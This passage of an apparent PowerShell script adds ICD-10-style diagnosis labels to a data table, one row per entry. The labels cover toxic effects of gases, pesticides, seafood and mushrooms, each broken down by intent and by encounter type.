hydrogen sulfide, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of hydrogen sulfide, assault","Toxic effect of hydrogen sulfide, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of hydrogen sulfide, assault","Toxic effect of hydrogen sulfide, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of hydrogen sulfide, assault","Toxic effect of hydrogen sulfide, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of hydrogen sulfide, undetermined","Toxic effect of hydrogen sulfide, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of hydrogen sulfide, undetermined","Toxic effect of hydrogen sulfide, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of hydrogen sulfide, undetermined","Toxic effect of hydrogen sulfide, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon dioxide, accidental (unintentional)","Toxic effect of carbon dioxide, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon dioxide, accidental (unintentional)","Toxic effect of carbon dioxide, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon dioxide, accidental (unintentional)","Toxic effect of carbon dioxide, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon dioxide, intentional self-harm","Toxic effect of carbon dioxide, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon dioxide, intentional self-harm","Toxic effect of carbon dioxide, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon dioxide, intentional self-harm","Toxic effect of carbon dioxide, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon dioxide, assault","Toxic effect of carbon dioxide, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon dioxide, assault","Toxic effect of carbon dioxide, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon dioxide, assault","Toxic effect of carbon dioxide, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon dioxide, undetermined","Toxic effect of carbon dioxide, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon dioxide, undetermined","Toxic effect of carbon dioxide, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon dioxide, undetermined","Toxic effect of carbon dioxide, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of smoke, accidental (unintentional)","Toxic effect of smoke, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of smoke, accidental (unintentional)","Toxic effect of smoke, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of smoke, accidental (unintentional)","Toxic effect of smoke, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of smoke, intentional self-harm","Toxic effect of smoke, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of smoke, intentional self-harm","Toxic effect of smoke, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of smoke, intentional self-harm","Toxic effect of smoke, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of smoke, assault","Toxic effect of smoke, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of smoke, assault","Toxic effect of smoke, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of smoke, assault","Toxic effect of smoke, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of smoke, undetermined","Toxic effect of smoke, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of smoke, undetermined","Toxic effect of smoke, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of smoke, undetermined","Toxic effect of smoke, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified gases, fumes and vapors, accidental (unintentional)","Toxic effect of other specified gases, fumes and vapors, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified gases, fumes and vapors, accidental (unintentional)","Toxic effect of other specified gases, fumes and vapors, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified gases, fumes and vapors, accidental (unintentional)","Toxic effect of other specified gases, fumes and vapors, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified gases, fumes and vapors, intentional self-harm","Toxic effect of other specified gases, fumes and vapors, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified gases, fumes and vapors, intentional self-harm","Toxic effect of other specified gases, fumes and vapors, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified gases, fumes and vapors, intentional self-harm","Toxic effect of other specified gases, fumes and vapors, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified gases, fumes and vapors, assault","Toxic effect of other specified gases, fumes and vapors, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified gases, fumes and vapors, assault","Toxic effect of other specified gases, fumes and vapors, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified gases, fumes and vapors, assault","Toxic effect of other specified gases, fumes and vapors, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified gases, fumes and vapors, undetermined","Toxic effect of other specified gases, fumes and vapors, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified gases, fumes and vapors, undetermined","Toxic effect of other specified gases, fumes and vapors, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified gases, fumes and vapors, undetermined","Toxic effect of other specified gases, fumes and vapors, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified gases, fumes and vapors, accidental (unintentional)","Toxic effect of unspecified gases, fumes and vapors, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified gases, fumes and vapors, accidental (unintentional)","Toxic effect of unspecified gases, fumes and vapors, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified gases, fumes and vapors, accidental (unintentional)","Toxic effect of unspecified gases, fumes and vapors, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified gases, fumes and vapors, intentional self-harm","Toxic effect of unspecified gases, fumes and vapors, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified gases, fumes and vapors, intentional self-harm","Toxic effect of unspecified gases, fumes and vapors, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified gases, fumes and vapors, intentional self-harm","Toxic effect of unspecified gases, fumes and vapors, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified gases, fumes and vapors, assault","Toxic effect of unspecified gases, fumes and vapors, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified gases, fumes and vapors, assault","Toxic effect of unspecified gases, fumes and vapors, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified gases, fumes and vapors, assault","Toxic effect of unspecified gases, fumes and vapors, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified gases, fumes and vapors, undetermined","Toxic effect of unspecified gases, fumes and vapors, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified gases, fumes and vapors, undetermined","Toxic effect of unspecified gases, fumes and vapors, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified gases, fumes and vapors, undetermined","Toxic effect of unspecified gases, fumes and vapors, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of organophosphate and carbamate insecticides, accidental (unintentional)","Toxic effect of organophosphate and carbamate insecticides, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of organophosphate and carbamate insecticides, accidental (unintentional)","Toxic effect of organophosphate and carbamate insecticides, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of organophosphate and carbamate insecticides, accidental (unintentional)","Toxic effect of organophosphate and carbamate insecticides, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of organophosphate and carbamate insecticides, intentional self-harm","Toxic effect of organophosphate and carbamate insecticides, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of organophosphate and carbamate insecticides, intentional self-harm","Toxic effect of organophosphate and carbamate insecticides, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of organophosphate and carbamate insecticides, intentional self-harm","Toxic effect of organophosphate and carbamate insecticides, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of organophosphate and carbamate insecticides, assault","Toxic effect of organophosphate and carbamate insecticides, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of organophosphate and carbamate insecticides, assault","Toxic effect of organophosphate and carbamate insecticides, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of organophosphate and carbamate insecticides, assault","Toxic effect of organophosphate and carbamate insecticides, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of organophosphate and carbamate insecticides, undetermined","Toxic effect of organophosphate and carbamate insecticides, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of organophosphate and carbamate insecticides, undetermined","Toxic effect of organophosphate and carbamate insecticides, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of organophosphate and carbamate insecticides, undetermined","Toxic effect of organophosphate and carbamate insecticides, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of halogenated insecticides, accidental (unintentional)","Toxic effect of halogenated insecticides, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of halogenated insecticides, accidental (unintentional)","Toxic effect of halogenated insecticides, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of halogenated insecticides, accidental (unintentional)","Toxic effect of halogenated insecticides, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of halogenated insecticides, intentional self-harm","Toxic effect of halogenated insecticides, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of halogenated insecticides, intentional self-harm","Toxic effect of halogenated insecticides, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of halogenated insecticides, intentional self-harm","Toxic effect of halogenated insecticides, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of halogenated insecticides, assault","Toxic effect of halogenated insecticides, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of halogenated insecticides, assault","Toxic effect of halogenated insecticides, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of halogenated insecticides, assault","Toxic effect of halogenated insecticides, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of halogenated insecticides, undetermined","Toxic effect of halogenated insecticides, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of halogenated insecticides, undetermined","Toxic effect of halogenated insecticides, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of halogenated insecticides, undetermined","Toxic effect of halogenated insecticides, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other insecticides, accidental (unintentional)","Toxic effect of other insecticides, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other insecticides, accidental (unintentional)","Toxic effect of other insecticides, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other insecticides, accidental (unintentional)","Toxic effect of other insecticides, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other insecticides, intentional self-harm","Toxic effect of other insecticides, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other insecticides, intentional self-harm","Toxic effect of other insecticides, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other insecticides, intentional self-harm","Toxic effect of other insecticides, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other insecticides, assault","Toxic effect of other insecticides, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other insecticides, assault","Toxic effect of other insecticides, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other insecticides, assault","Toxic effect of other insecticides, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other insecticides, undetermined","Toxic effect of other insecticides, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other insecticides, undetermined","Toxic effect of other insecticides, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other insecticides, undetermined","Toxic effect of other insecticides, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of herbicides and fungicides, accidental (unintentional)","Toxic effect of herbicides and fungicides, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of herbicides and fungicides, accidental (unintentional)","Toxic effect of herbicides and fungicides, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of herbicides and fungicides, accidental (unintentional)","Toxic effect of herbicides and fungicides, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of herbicides and fungicides, intentional self-harm","Toxic effect of herbicides and fungicides, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of herbicides and fungicides, intentional self-harm","Toxic effect of herbicides and fungicides, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of herbicides and fungicides, intentional self-harm","Toxic effect of herbicides and fungicides, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of herbicides and fungicides, assault","Toxic effect of herbicides and fungicides, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of herbicides and fungicides, assault","Toxic effect of herbicides and fungicides, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of herbicides and fungicides, assault","Toxic effect of herbicides and fungicides, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of herbicides and fungicides, undetermined","Toxic effect of herbicides and fungicides, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of herbicides and fungicides, undetermined","Toxic effect of herbicides and fungicides, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of herbicides and fungicides, undetermined","Toxic effect of herbicides and fungicides, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of rodenticides, accidental (unintentional)","Toxic effect of rodenticides, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of rodenticides, accidental (unintentional)","Toxic effect of rodenticides, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of rodenticides, accidental (unintentional)","Toxic effect of rodenticides, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of rodenticides, intentional self-harm","Toxic effect of rodenticides, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of rodenticides, intentional self-harm","Toxic effect of rodenticides, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of rodenticides, intentional self-harm","Toxic effect of rodenticides, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of rodenticides, assault","Toxic effect of rodenticides, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of rodenticides, assault","Toxic effect of rodenticides, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of rodenticides, assault","Toxic effect of rodenticides, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of rodenticides, undetermined","Toxic effect of rodenticides, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of rodenticides, undetermined","Toxic effect of rodenticides, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of rodenticides, undetermined","Toxic effect of rodenticides, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other pesticides, accidental (unintentional)","Toxic effect of other pesticides, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other pesticides, accidental (unintentional)","Toxic effect of other pesticides, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other pesticides, accidental (unintentional)","Toxic effect of other pesticides, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other pesticides, intentional self-harm","Toxic effect of other pesticides, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other pesticides, intentional self-harm","Toxic effect of other pesticides, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other pesticides, intentional self-harm","Toxic effect of other pesticides, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other pesticides, assault","Toxic effect of other pesticides, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other pesticides, assault","Toxic effect of other pesticides, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other pesticides, assault","Toxic effect of other pesticides, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other pesticides, undetermined","Toxic effect of other pesticides, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other pesticides, undetermined","Toxic effect of other pesticides, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other pesticides, undetermined","Toxic effect of other pesticides, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified pesticide, accidental (unintentional)","Toxic effect of unspecified pesticide, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified pesticide, accidental (unintentional)","Toxic effect of unspecified pesticide, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified pesticide, accidental (unintentional)","Toxic effect of unspecified pesticide, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified pesticide, intentional self-harm","Toxic effect of unspecified pesticide, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified pesticide, intentional self-harm","Toxic effect of unspecified pesticide, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified pesticide, intentional self-harm","Toxic effect of unspecified pesticide, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified pesticide, assault","Toxic effect of unspecified pesticide, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified pesticide, assault","Toxic effect of unspecified pesticide, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified pesticide, assault","Toxic effect of unspecified pesticide, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified pesticide, undetermined","Toxic effect of unspecified pesticide, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified pesticide, undetermined","Toxic effect of unspecified pesticide, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified pesticide, undetermined","Toxic effect of unspecified pesticide, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Ciguatera fish poisoning, accidental (unintentional)","Ciguatera fish poisoning, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Ciguatera fish poisoning, accidental (unintentional)","Ciguatera fish poisoning, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Ciguatera fish poisoning, accidental (unintentional)","Ciguatera fish poisoning, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Ciguatera fish poisoning, intentional self-harm","Ciguatera fish poisoning, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Ciguatera fish poisoning, intentional self-harm","Ciguatera fish poisoning, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Ciguatera fish poisoning, intentional self-harm","Ciguatera fish poisoning, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Ciguatera fish poisoning, assault","Ciguatera fish poisoning, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Ciguatera fish poisoning, assault","Ciguatera fish poisoning, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Ciguatera fish poisoning, assault","Ciguatera fish poisoning, assault, sequela") + $null = $DiagnosisList.Rows.Add("Ciguatera fish poisoning, undetermined","Ciguatera fish poisoning, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Ciguatera fish poisoning, undetermined","Ciguatera fish poisoning, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Ciguatera fish poisoning, undetermined","Ciguatera fish poisoning, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Scombroid fish poisoning, accidental (unintentional)","Scombroid fish poisoning, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Scombroid fish poisoning, accidental (unintentional)","Scombroid fish poisoning, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Scombroid fish poisoning, accidental (unintentional)","Scombroid fish poisoning, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Scombroid fish poisoning, intentional self-harm","Scombroid fish poisoning, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Scombroid fish poisoning, intentional self-harm","Scombroid fish poisoning, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Scombroid fish poisoning, intentional self-harm","Scombroid fish poisoning, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Scombroid fish poisoning, assault","Scombroid fish poisoning, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Scombroid fish poisoning, assault","Scombroid fish poisoning, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Scombroid fish poisoning, assault","Scombroid fish poisoning, assault, sequela") + $null = $DiagnosisList.Rows.Add("Scombroid fish poisoning, undetermined","Scombroid fish poisoning, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Scombroid fish poisoning, undetermined","Scombroid fish poisoning, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Scombroid fish poisoning, undetermined","Scombroid fish poisoning, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Other fish poisoning, accidental (unintentional)","Other fish poisoning, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Other fish poisoning, accidental (unintentional)","Other fish poisoning, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other fish poisoning, accidental (unintentional)","Other fish poisoning, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Other fish poisoning, intentional self-harm","Other fish poisoning, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other fish poisoning, intentional self-harm","Other fish poisoning, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other fish poisoning, intentional self-harm","Other fish poisoning, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Other fish poisoning, assault","Other fish poisoning, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Other fish poisoning, assault","Other fish poisoning, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other fish poisoning, assault","Other fish poisoning, assault, sequela") + $null = $DiagnosisList.Rows.Add("Other fish poisoning, undetermined","Other fish poisoning, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Other fish poisoning, undetermined","Other fish poisoning, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other fish poisoning, undetermined","Other fish poisoning, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Other shellfish poisoning, accidental (unintentional)","Other shellfish poisoning, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Other shellfish poisoning, accidental (unintentional)","Other shellfish poisoning, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other shellfish poisoning, accidental (unintentional)","Other shellfish poisoning, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Other shellfish poisoning, intentional self-harm","Other shellfish poisoning, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other shellfish poisoning, intentional self-harm","Other shellfish poisoning, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other shellfish poisoning, intentional self-harm","Other shellfish poisoning, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Other shellfish poisoning, assault","Other shellfish poisoning, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Other shellfish poisoning, assault","Other shellfish poisoning, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other shellfish poisoning, assault","Other shellfish poisoning, assault, sequela") + $null = $DiagnosisList.Rows.Add("Other shellfish poisoning, undetermined","Other shellfish poisoning, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Other shellfish poisoning, undetermined","Other shellfish poisoning, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other shellfish poisoning, undetermined","Other shellfish poisoning, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other seafood, accidental (unintentional)","Toxic effect of other seafood, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other seafood, accidental (unintentional)","Toxic effect of other seafood, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other seafood, accidental (unintentional)","Toxic effect of other seafood, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other seafood, intentional self-harm","Toxic effect of other seafood, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other seafood, intentional self-harm","Toxic effect of other seafood, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other seafood, intentional self-harm","Toxic effect of other seafood, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other seafood, assault","Toxic effect of other seafood, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other seafood, assault","Toxic effect of other seafood, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other seafood, assault","Toxic effect of other seafood, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other seafood, undetermined","Toxic effect of other seafood, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other seafood, undetermined","Toxic effect of other seafood, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other seafood, undetermined","Toxic effect of other seafood, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified seafood, accidental (unintentional)","Toxic effect of unspecified seafood, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified seafood, accidental (unintentional)","Toxic effect of unspecified seafood, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified seafood, accidental (unintentional)","Toxic effect of unspecified seafood, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified seafood, intentional self-harm","Toxic effect of unspecified seafood, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified seafood, intentional self-harm","Toxic effect of unspecified seafood, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified seafood, intentional self-harm","Toxic effect of unspecified seafood, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified seafood, assault","Toxic effect of unspecified seafood, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified seafood, assault","Toxic effect of unspecified seafood, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified seafood, assault","Toxic effect of unspecified seafood, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified seafood, undetermined","Toxic effect of unspecified seafood, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified seafood, undetermined","Toxic effect of unspecified seafood, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified seafood, undetermined","Toxic effect of unspecified seafood, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of ingested mushrooms, accidental (unintentional)","Toxic effect of ingested mushrooms, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ingested mushrooms, accidental (unintentional)","Toxic effect of ingested mushrooms, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ingested mushrooms, accidental (unintentional)","Toxic effect of ingested mushrooms, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of ingested mushrooms, intentional self-harm","Toxic effect of ingested mushrooms, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ingested mushrooms, intentional self-harm","Toxic effect of ingested mushrooms, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ingested mushrooms, intentional self-harm","Toxic effect of ingested mushrooms, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of ingested mushrooms, assault","Toxic effect of ingested mushrooms, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ingested mushrooms, assault","Toxic effect of ingested mushrooms, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ingested mushrooms, assault","Toxic effect of ingested mushrooms, 